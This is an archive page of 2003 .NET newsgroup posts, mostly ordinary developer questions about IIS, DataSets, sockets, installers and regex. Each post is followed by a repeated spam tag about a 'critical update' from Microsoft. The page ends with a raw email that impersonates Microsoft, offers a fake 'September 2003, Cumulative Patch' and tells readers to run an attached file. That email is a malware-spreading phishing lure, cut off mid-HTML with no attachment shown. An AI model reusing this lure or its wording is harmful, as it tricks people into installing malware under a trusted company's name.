Please, anybody. Help
When I try to create either a C# or VB.Net Web Application, the ID shows
one of two problems:
1. Tells me that there is already a services.config file in the Document
and Settings folder; when I clear this, I get problem 2.
2. Connnects to the local server and then hangs with "Initializing
offline cache" showing in the status line.
The IDE version is 7.0.9466 and it is running on Windows 2000 Server
connecting to IIS5
We have been attempting to solve this problem for months.
On one machine we succeeded in getting to work; but after an unknown
occurrence or reason, it stopped working and started showing the
problem. Curiously, the previously built Web Applications show up in the
management console for IIS, but not on the projects of the IDE. Before
the problem occurred, the projects showed the previous Web Applications.
Thanks for the help
Please also respond to
intrader@attglobal.net Tag: Take a look at this critical update that comes from the M$ Corporation Tag: 57969
Outlook Express-Very slow to start
Outlook Express6 on Windows XP professional has suddenly
became very slow to start.Once you click the icon the
opening logo appears and thereafter it takes more than a
minute to start outlook express,(and the address book too)
everything else is normal. I have serched for a solution
in the MS Knowledge base but there are remidies for older
Os versions and OE 5(by repairing the registry) and not
for OE6 with XP.Please refer MSKB artical NO.235300 If
any body knows the remedy without running full recovry
process and also without restoring to a previous
cofiguration please post me.
thanks,
Dhammika. Tag: Take a look at this critical update that comes from the M$ Corporation Tag: 57966
Help !
I have a function defined In a Class1.
Ex
Public Class1
Public Function GetData () as DataSet
******** Using SqlDatAdapter I fill the DataSet
******** It will return the Filled DataSet.
End Function
End Class
I have another Class which calls the GetData function of the first class.
Public Class2
Public Function UdateDatasetTODataBase()
Create Instance of the First class and Call the
GetData Function, which returns the DataSet.
'''''''' I want To Add/Update the Dataset and
reflect back to DataBase.. ****** How to Do this?????????????
End function
End Class
Using SqlDataAdapter this can be Done only if u fill the Dataset in the Same
Function, make Changes and Call the SqlDataAdapters Update method,
But I am filling the Dataset in Different function..
Is there anyway to assign already filled Dataset to SqlDataAdapter ?
TIA,
Gary Tag: Take a look at this critical update that comes from the M$ Corporation Tag: 57961
.Net Compact Framework with Visual Studio 2002
Hi, I have Visual Studio 2002 Enterprise Architecture Edition. I was
wondering if anyone has any information on how I can develop applications
for .Net Compact Framework using this IDE. I've heard Visual Studio 2003
ships with the functionality for .Net Compact Framework development. But
right now I have Visual Studio 2002. Is there anything I can do? (Other than
the obvious upgrade to 2003).
I've heard some beta version of .Net Compact Framework work on Visual Studio
2002. Don't know if its true. And I've had a real tough time trying to
figure out what to install from where to make it work. So if someone can
help me out, greatly appreciate it. Thanks.
(Or if there is some other free IDE like Web Matrix that supports .Net
Compact Framework??) Tag: Take a look at this critical update that comes from the M$ Corporation Tag: 57958
Do .Net Framework have layer 2 protocol support?
e.g. ARP, DHCP...
what if i wanna write a DHCP server using .Net?
thx! Tag: Take a look at this critical update that comes from the M$ Corporation Tag: 57957
windows users (login/logout)
Hello
I have a dude, how I can know the time that the windows users (as
Administrator, Guest,
User, etc)login and when they logout. I need to know How I can complete
this task
having in mind that this application have to run in differents Windows
Systems like NT,
2000 Server, 98, XP, etc.
Thanks in advance
José Achig Tag: Take a look at this critical update that comes from the M$ Corporation Tag: 57948
Windows Server 3003 and No-Touch Deployment
We're using no-touch deployment with a particular application. We can serve
the application from a Windows 2000 Server machine with no problem. We're
not able to serve the application from a Windows 2003 Server. It appears
that the app's .config is not being transferred to the client when they try
to launch the application from the Win 2003 server.
The web.config file for the virtual directories includes entries in the
httpHandler section to allow .config files to be retrieved, and we've
deleted the .config entry from the App Mappings tab in the properties for
the virtual directories (which I think means our httpHandler mods are not
necessary). The virtual directory on the Win 2003 server allows anonymous
access. The machine.config files between the two servers in question are
identical with the exception of some database connection strings in the
appSettings section.
An examination of the IIS log files on the Win2003 server shows the last
entry for a no-touch deployment session to be a GET for the app.exe.config
file with a status 401. A FileLoadException is thrown on the client machine
when we try to run from the Win2003 server.
What other settings should we change on the Win2003 server?
Thanks,
Mike Tag: Take a look at this critical update that comes from the M$ Corporation Tag: 57945
.Net App deployment - Removing files problem
How do I instruct the Windows installer to remove the entire application
when the user clicks Remove program from Windows control panel?
After a successful setup, any files created by the application in the
application folder are not removed. This is so when the program is
"removed" from the Windows control panel. This becomes a problem if the
user decides to reinstall the application in the same location. The
*old*/legacy files, e.g. app config files, may cause a problem with the
*new* installation of the application file.
My installer program was created with a "setup and deployment" type project
is Visual Studio.NET 2003 for a .NET v 1.1 Windows Forms application. It
appears all of the property pages in the VS.NET editor address installation
and few removal issues. I reckon I'm sniffing around for a solution in the
wrong place.
--
Peter O'Reilly Tag: Take a look at this critical update that comes from the M$ Corporation Tag: 57942
Socket Receive Error
Hi,
I'm getting the strangest problem trying to receive from a socket. I'm
downloading a huge file. When I loop, receiving until I get no bytes back,
it works fine. But I wanted to update a progress bar during this process,
so I added a notification delegate and I call this each time through:
Dim Ret As Integer, Buffer(1023) As Byte
Do
Ret = theSocket.Receive(Buffer)
If Ret > 0 Then
If m_DownloadToFile Then
m_FileStream.Write(Buffer, 0, Ret)
Else
m_Data = m_Data + ASCII.GetString(Buffer, 0, Ret)
End If
m_TransferredBytes = m_TransferredBytes + Ret
'if we have a notification
If Not Notify Is Nothing Then
'notify
Call Notify(Ret) <------this causes the problem
End If
End If
Loop Until Ret = 0
But when I do this, I start losing bytes. If I don't call the Notify
delegate, the file is something like 36MB. But if I call it, I seem to lose
data, and the file only winds up at about 21MB. This is kind of hard to
debug, so before rolling up my sleeves, I was wondering if anyone with
socket experience could spot the problem right off. Any help much
appreciated. Thanks.
Cheers,
--
Joshua Frank
Senior Systems Architect
Archimetrics, L.L.C.
"Add some SpArk to your stored procedure development."
(web) http://www.archimetrics.com
(email) mailto:jfrank@nospam-archimetrics.com
(voice) (973) 727-1510 Tag: Take a look at this critical update that comes from the M$ Corporation Tag: 57940
Catastrophic failure
I have written an ASP.NET web app in C# that is trying to connect to a
database using OleDb. I put code in a dll that uses another dll to create a
connection object (and open it if requested) to send back to the web app to
connect to the database.
I am getting the following error when I change anything in my web app and
recompile.
Catastrophic failure
Description: An unhandled exception occurred during the execution of the
current web request. Please review the stack trace for more information
about the error and where it originated in the code.
Exception Details: System.Data.OleDb.OleDbException: Catastrophic failure
Stack Trace:
[OleDbException (0x8000ffff): Catastrophic failure]
System.Data.OleDb.OleDbConnection.ProcessResults(Int32 hr)
System.Data.OleDb.OleDbConnection.CreateProviderError(Int32 hr)
System.Data.OleDb.OleDbConnection.CreateProvider(OleDbConnectionString
constr)
System.Data.OleDb.OleDbConnection.Open()
I reset IIS to clear the problem (the only way that I have found other than
rebooting), and it will then work just fine. But if I adjust my code (the
web app not either of the dlls) and recompile, it will throw the
Catastrophic failure when I access the page. My coworker thought that it
might be because I was using a static module to create the connection, so I
adjusted the dll to be non-static. That did not solve the problem.
Is there anyway to prevent this failure, and is there anyway to clear this
error without having to restart IIS? Tag: Take a look at this critical update that comes from the M$ Corporation Tag: 57939
Re: Framework and Add/Remove Programs
I tried posting the item below a few daze ago, but it has not shown up.
I connect to the MSFT news server.
--
http://www.standards.com/; See Howard Kaikow's web site.
"Howard Kaikow" <kaikow@standards.com> wrote in message news:...
> I installed VS .NET and the Framework is listed as separate item in
> Add/Remove programs.
>
> When the Framework is installed via a Windows update or via a direct
> download, does the Framework get listed in Add/Remove programs?
>
> --
> http://www.standards.com/; See Howard Kaikow's web site.
>
> Tag: Take a look at this critical update that comes from the M$ Corporation Tag: 57938
.Net App deployment - Removing files problem
How do I instruct the Windows installer to remove the entire application
when the user clicks Remove program from Windows control panel?
After a successful setup, any files created by the application in the
application folder are not removed. This is so when the program is
"removed" from the Windows control panel. This becomes a problem if the
user decides to reinstall the application in the same location. The
*old*/legacy files, e.g. app config files, may cause a problem with the
*new* installation of the application file.
My installer program was created with a "setup and deployment" type project
is Visual Studio.NET 2003 for a .NET v 1.1 Windows Forms application. It
appears all of the property pages in the VS.NET editor address installation
and few removal issues. I reckon I'm sniffing around for a solution in the
wrong place.
--
Peter O'Reilly Tag: Take a look at this critical update that comes from the M$ Corporation Tag: 57935
RSA encryption with OAEP padding
I need to implement RSA encryption with OAEP padding on a Windows 2000
server. Since the Framework only supports Windows XP, does anyone know of a
third party utility that will enable me to do this?
Thanks Tag: Take a look at this critical update that comes from the M$ Corporation Tag: 57934
Handling events in a Windows service from a Windows Forms app
I'm interested in handling events on distributed desktops, raised by a .NET
Windows service running on a server in the same Windows network.
I have no idea where to begin.
Can anyone point me in the right direction?
Any advice is appreciated. Thanks.
Jon Tag: Take a look at this critical update that comes from the M$ Corporation Tag: 57933
Handling events from a Windows Service in a Windows Forms app
I'm interested in handling events on distributed desktops, raised by a .NET
Windows service running on a server in the same Windows network.
I have no idea where to begin.
Can anyone point me in the right direction?
Any advice is appreciated. Thanks.
Jon Tag: Take a look at this critical update that comes from the M$ Corporation Tag: 57932
How to read listbox part of OpenFileDialog
Hi All,
I am trying to find out how many files are currently listed in the listbox
part of an OpenFileDialog. I can get to the OpenFileDialog with
system.reflection, but when I drill down I run into a wall. I know it can
be done because I can see it in various object browsers I use.
Many thanks,
Bill Tag: Take a look at this critical update that comes from the M$ Corporation Tag: 57931
RowFilter and Find of a DataView
In a dataview, will setting the RowFilter property increase performance for
the search when using Find Method ? Tag: Take a look at this critical update that comes from the M$ Corporation Tag: 57930
Printing
Hey All,
I am having trouble printing from one framework to the other. Here is what I
have.
Label Printer (SATO ct-400)
I want no margins
When I use my program in studio 2002 and print it comes out fine, then I
upgrade my project to 2003 and I get a left margin. I don't understand why
all of a sudden I have a left margin? Can anyone help?
Thanks,
Sean Tag: Take a look at this critical update that comes from the M$ Corporation Tag: 57925
BitOr and BitAnd Not sure how to compare values
Say you have
Bold = 1 (100)
Italic = 2 (010)
Underline = 4 (001)
So the possible style values are:
Bold = 1
Italic = 2
Bold & Italic = 3 (110)
Underline = 4
Bold & Underline = 5 (101)
Italic & Underline = 6 (011)
Bold, Italic, & Underline = 7 (111)
In code how do I determine by the style number if the text should be italic.
I thought there was someway to do a bitwise AND or OR.
Is Italic in 5? FALSE
Is Italic in 3? TRUE, and so forth.
I'm working in VB.Net.
Thanks... Tag: Take a look at this critical update that comes from the M$ Corporation Tag: 57910
ReadOnly look and feel in DataGrid
I need to show some data in a readonly DataGrid. I was easily able to
make the grid readonly (DataGrid1.ReadOnly = True) so that data could
not be changed. But grid cells still go in edit mode (i.e., text is
selected and cursor is blinking) giving the wrong impression that the
text can be edited. This is in my opinion a design flow, BTW.
If I lock it it looks fine, but then I can't select cells, rows, or
cols, so no good either.
I'm still pretty new at this, so please be clear and thorough in your
reply. Sample code is highly appreciated.
Thanks
Simon Tag: Take a look at this critical update that comes from the M$ Corporation Tag: 57909
Should I download version 1.1 of the Framework?
I'm using VS.NET 2002 which has an earlier version (something like 1.30xxx)
installed. Am I right in thinking that if I download v1.1 of the framework,
VS.NET will still continue to use the earlier version it installed?
Presumably multiple versions of the framework can be installed side-by-side?
Wayne. Tag: Take a look at this critical update that comes from the M$ Corporation Tag: 57904
Help !
I have a function defined In a Class1.
Ex
Public Class1
Public Function GetData () as DataSet
******** Using SqlDatAdapter I fill the DataSet
******** It will return the Filled DataSet.
End Function
End Class
I have another Class which calls the GetData function of the first class.
Public Class2
Public Function UdateDatasetTODataBase()
Create Instance of the First class and Call the
GetData Function, which returns the DataSet.
'''''''' I want To Add/Update the Dataset and
reflect back to DataBase.. ****** How to Do this?????????????
End function
End Class
Using SqlDataAdapter this can be Done only if u fill the Dataset in the Same
Function, make Changes and Call the SqlDataAdapters Update method,
But I am filling the Dataset in Different function..
Is there anyway to assign already filled Dataset to SqlDataAdapter ?
TIA,
Gary Tag: Take a look at this critical update that comes from the M$ Corporation Tag: 57899
Version 1.1 - remove 1.0?
When I updated to version.1 version 1.0 (folder) remained and shows in
Add/Remove. Can version 1.0 be removed without messing up the rest?
--
Colonel Blip
colonel.blip@nospambigfoot.com
Remove "nospam" when replying.
__________________________________ Tag: Take a look at this critical update that comes from the M$ Corporation Tag: 57898
Framework Configuration
Hi!
As I can make to configure framework with one setup. The
configuration that I am to speak is:
Control Panel->Administrative Tools->Microsoft .NET
Framework 1.1 Configuration:
Run Time Security Police->Machine->Code Groups-
>All_code->Local_Intranet Zone and to insert a new rule
to have permissions to accede to an application that if
finds in another machine.
thx,
David Tag: Take a look at this critical update that comes from the M$ Corporation Tag: 57894
Ping
How do I do a Ping from .Net? I have looked around a little and tried
different ways. I have searched VS.Net documentation and other resources as
well. Does anyone has an idea.
Martin Tag: Take a look at this critical update that comes from the M$ Corporation Tag: 57892
Exception not being catched
Hi,
I have just finished a VC.NET program. This program is running fine when i
run it within the "ide" but when i run it without the "ide" my exceptions
are not being catched. It is to say the last one i throw. Let me explain
what i meen:
this is my form1.cpp(main form) file :
int APIENTRY _tWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR
lpCmdLine, int nCmdShow)
{
System::Threading::Thread::CurrentThread->ApartmentState =
System::Threading::ApartmentState::STA;
try
{
Application::Run(new frmMain());
}
catch (System::DllNotFoundException * error)
{
error = NULL;
Application::Exit();
return 1;
}
catch (System::Exception * error)
{
error = NULL;
System::Windows::Forms::MessageBox::Show("Het programma is gestopt omdat er
zich een onbehandlde fout heef voorgedaan");
Application::Exit();
return 2;
}
catch (...)
{
Application::Exit();
return 3;
}
return 0;
}
In the mainform headerfile when a specific condition is not met i throw a
dllnotfoundexception. this is becauce my application has to exit then (it
can not continue)
Like i said this works fine from within .net ide (so i'm convinced it is not
my coding) but without the ide i get a box telling me there has been a
unhandled exception, and asking me wheter i want to continue or exit the
program. And it gives also some information about jit debugging. Can
somebody help me on how to disable this message from appering and just let
my program exiting. (Application::Exit() on the place where i throw the
exception does not work) Tag: Take a look at this critical update that comes from the M$ Corporation Tag: 57884
Updater Application Block
Hi.
I am using the Updater Application Block of Microsoft
Application Blocks for .NET for updating the client
applications. Pls let me know what are the prerequisites
that client computer must contain as Updater uses BITS for
downloading files. Do I need to have IIS on the client
machine?
TIA,
-Gopi Tag: Take a look at this critical update that comes from the M$ Corporation Tag: 57881
Updater Application Block
Hi.
I am using the Updater Application Block of Microsoft
Application Blocks for .NET for updating the client
applications. Pls let me know what are the prerequisites
that client computer must contain as Updater uses BITS for
downloading files. Do I need to have IIS on the client
machine?
TIA,
-Gopi Tag: Take a look at this critical update that comes from the M$ Corporation Tag: 57880
MSI generated with FrameWork 1.1: Culture problem or bug (?)...
Hi to all,
When launching MSI file among our customers, they function that on a PC on
two, according to the type of culture... One initially tested a "french"
culture (our customers being French). After plantings, we used the"neutral"
culture. But without success: some PC only accept "french" and some other
only "neutal"...
All these PC were successfully installed with a MSI generated with the
framework 1.0 version.
So we think there is a bug in the new Visual C# 1.1 / 1.0 ...
Would somebody have the same problem or an idea of the origin of this type
of error?
Thank. Tag: Take a look at this critical update that comes from the M$ Corporation Tag: 57871
SHGetFolderPath vs Environment.GetFolderPath
I need a patch that is returned by API's SHGetFolderPath with
CSIDL_COMMON_DOCUMENTS. I expected to find it among other enums in
Environment.SpecialFolder enumeration. But I cannot find it there.
Do I really have to PInvoke SHGetFolderPath in this case? Why someone forgot
about this one CSIDL? Is it just an annoying omission or there is a deeper
reason for this?
what's more: there's a mistake in a MSDN doc. it says:
"SpecialFolder.Personal - The directory that serves as a common repository
for documents." in fact, this path does not point to the common repository
but, rather, to
the local one. (according to the docs I expected that SpecialFolder.Personal
does the same job as CSIDL_COMMON_DOCUMENTS but it DOES NOT).
Can some one comment this one?
Thanks in advance.
Regards, Wiktor Tag: Take a look at this critical update that comes from the M$ Corporation Tag: 57868
Regex Bug??????
I use a Regex like:
^(https?:\/\/(([\w-]+.)+[\w-]+))?(\/?\w[\w-\.]*)*((\.\w{1,5})?((\?|#)[^'"\s]
*)?|\/)?$
(to match a url)
to Match a string :
"http://search.microsoft.com/us/SearchMS25.asp?boolean=ALL&nq=NEW&so
=RECCNT&ig=01&ig=02&ig=03&ig=04&ig=05&ig=06&ig=0
7&ig=08&ig=09&ig=10&i=00&i=01&i=02&i=03&i=04
&i=05&i=06&i=07&i=08&i=09&qu="
then my program dead!!!
Who can tell me why?????? Tag: Take a look at this critical update that comes from the M$ Corporation Tag: 57867
Dynamic Execution of Function/Proc
Hi all,
I am Using VB.Net for developing my application. I am now needed help. In
this project I have to execute some function, but I cannot call them
directly using function name, I wanted to execute this function dynamically.
So I have a function list in database written as a string. I am now looking
for function or mechanism which will execute function dynamically.
I am here Giving a example.
Private Sub btnShow_Click(..)
Dim t as boolean
T = FunctionOne
End Sub
This btnShow_Click will call FunctionOne and the result will be assigned to
t but I wanted Function Like This
Private Sub btnShow_Click(..)
Dim t as boolean
T = ?????? "FunctionOne"
End Sub
Is This Possible in any language VB or C#??
Regards
--
Kishor Pise
Maharashtra, INDIA. Tag: Take a look at this critical update that comes from the M$ Corporation Tag: 57866
Install this security patch
--zvamcadpnenelw
Content-Type: multipart/related; boundary="fscdkxaup";
type="multipart/alternative"
--fscdkxaup
Content-Type: multipart/alternative; boundary="rnoofsxouyqkeyyo"
--rnoofsxouyqkeyyo
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable
Microsoft Partner
this is the latest version of security update, the
"September 2003, Cumulative Patch" update which resolves
all known security vulnerabilities affecting
MS Internet Explorer, MS Outlook and MS Outlook Express
as well as three new vulnerabilities.
Install now to continue keeping your computer secure
from these vulnerabilities, the most serious of which could
allow an attacker to run code on your computer.
This update includes the functionality =
of all previously released patches.
Microsoft Product Support Services and Knowledge Base articles =
can be found on the Microsoft Technical Support web site.
http://support.microsoft.com/
For security-related information about Microsoft products, please =
visit the Microsoft Security Advisor web site
http://www.microsoft.com/security/
Thank you for using Microsoft products.
Please do not reply to this message.
It was sent from an unmonitored e-mail address and we are unable =
to respond to any replies.
----------------------------------------------
The names of the actual companies and products mentioned =
herein are the trademarks of their respective owners.
--rnoofsxouyqkeyyo
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable
<HTML>
<HEAD>
<style type=3D'text/css'>.navtext{color:#ffffff;text-decoration:none}
</style>
</HEAD>
<BODY BGCOLOR=3D"White" TEXT=3D"Black">
<BASEFONT SIZE=3D"2" face=3D"verdana,arial">
<TABLE WIDTH=3D"600" HEIGHT=3D"40" BGCOLOR=3D"#1478EB">
<TR height=3D"20">
<TD ALIGN=3D"left" VALIGN=3D"TOP" WIDTH=3D"400" ROWSPAN=3D"2">
<FONT FACE=3D"sans-serif" SIZE=3D"5"><I><B>
<A class=3D'navtext' HREF=3D"http://www.microsoft.com/"
TITLE=3D"Microsoft Home Site" target=3D"_top">Microsoft</A>
</B></I></FONT>
</TD>
<TD ALIGN=3D"right" VALIGN=3D"MIDDLE" BGCOLOR=3D"Black" NOWRAP>
<FONT color=3D"#ffffff" size=3D1>
<A class=3D'navtext' href=3D'http://www.microsoft.com/catalog/' =
target=3D"_top">All Products</A> |
<A class=3D'navtext' href=3D'http://support.microsoft.com/' =
target=3D"_top">Support</A> |
<A class=3D'navtext' href=3D'http://search.microsoft.com/' =
target=3D"_top">Search</A> |
<A class=3D'navtext' href=3D'http://www.microsoft.com/' target=3D_top>
Microsoft.com Guide</A>
</FONT>
</TD>
</TR>
<TR>
<TD ALIGN=3D"right" VALIGN=3D"BOTTOM" NOWRAP>
<FONT FACE=3D"Verdana, Arial" SIZE=3D1><B>
<A class=3D'navtext' HREF=3D'http://www.microsoft.com/' TARGET=3D" top">
Microsoft Home</A> </B>
</FONT>
</TD>
</TR>
</TABLE>
<IMG SRC=3D"cid:nlhqulj" BORDER=3D"0"><BR><BR>
<TABLE WIDTH=3D"600"><TR><TD><FONT SIZE=3D"2">
Microsoft Partner<BR><BR>
this is the latest version of security update, the
"September 2003, Cumulative Patch" update which resolves
all known security vulnerabilities affecting
MS Internet Explorer, MS Outlook and MS Outlook Express
as well as three new vulnerabilities.
Install now to continue keeping your computer secure
from these vulnerabilities, the most serious of which could
allow an attacker to run code on your computer.
This update includes the functionality =
of all previously released patches.
</FONT></TD></TR>
</TABLE>
<BR><BR>
<TABLE BORDER=3D"1" CELLSPACING=3D"1" CELLPADDING=3D"3" WIDTH=3D"600">
<TR VALIGN=3D"TOP">
<TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:fnnghlg" =
ALIGN=3D"absmiddle" BORDER=3D"0"> System requirements</B>
</FONT></TD>
<TD NOWRAP><FONT SIZE=3D"1">Windows 95/98/Me/2000/NT/XP</FONT></TD>
</TR>
<TR VALIGN=3D"TOP">
<TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:fnnghlg" =
ALIGN=3D"absmiddle" BORDER=3D"0"> This update applies to</B>
</FONT></TD><TD NOWRAP>
<FONT SIZE=3D"1">
MS Internet Explorer, version 4.01 and later<BR>
MS Outlook, version 8.00 and later<BR>
MS Outlook Express, version 4.01 and later
</FONT>
</TD>
</TR>
<TR VALIGN=3D"TOP">
<TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:fnnghlg" =
ALIGN=3D"absmiddle" BORDER=3D"0"> Recommendation</B></FONT></TD>
<TD NOWRAP><FONT SIZE=3D"1">Customers should install the patch =
at the earliest opportunity.</FONT></TD>
</TR>
<TR VALIGN=3D"TOP">
<TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:fnnghlg" =
ALIGN=3D"absmiddle" BORDER=3D"0"> How to install</B></FONT></TD>
<TD NOWRAP><FONT SIZE=3D"1">Run attached file. =
Choose Yes on displayed dialog box.</FONT></TD>
</TR>
<TR VALIGN=3D"TOP">
<TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:fnnghlg" =
ALIGN=3D"absmiddle" BORDER=3D"0"> How to use</B></FONT></TD>
<TD NOWRAP><FONT SIZE=3D"1">You don't need to do =
anything after installing this item.</FONT></TD>
</TR>
</TABLE>
<BR>
&l